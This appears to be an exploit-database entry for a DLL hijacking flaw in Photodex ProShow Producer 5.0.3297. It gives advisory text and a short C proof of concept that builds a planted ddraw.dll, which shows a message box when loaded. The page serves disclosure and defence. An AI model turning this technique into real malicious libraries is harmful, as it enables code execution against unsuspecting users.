header-logo
Suggest Exploit
vendor:
ProShow Producer
by:
SecurityFocus
9,3
CVSS
HIGH
Arbitrary Code Execution
94
CWE
Product Name: ProShow Producer
Affected Version From: 5.0.3297
Affected Version To: 5.0.3297
Patch Exists: YES
Related CWE: N/A
CPE: a:photodex:proshow_producer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2013

Photodex ProShow Producer Arbitrary Code Execution Vulnerability

Photodex ProShow Producer is prone to multiple arbitrary code-execution vulnerabilities. An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a customized library file from application path which contains a specially crafted code. Successful exploits will compromise the application in the context of the currently logged-in user.

Mitigation:

Users should avoid opening files from untrusted sources and should keep their software up-to-date.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/58131/info

Photodex ProShow Producer is prone to multiple arbitrary code-execution vulnerabilities.

An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a customized library file from application path which contains a specially crafted code. Successful exploits will compromise the application in the context of the currently logged-in user.

Photodex ProShow Producer 5.0.3297 is vulnerable; other versions may also be affected. 

// wine gcc -Wall -shared inject.c -o ddraw.dll
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        MessageBox(0,"DLL Injection","DLL Injection", 0);
    }
return TRUE;
}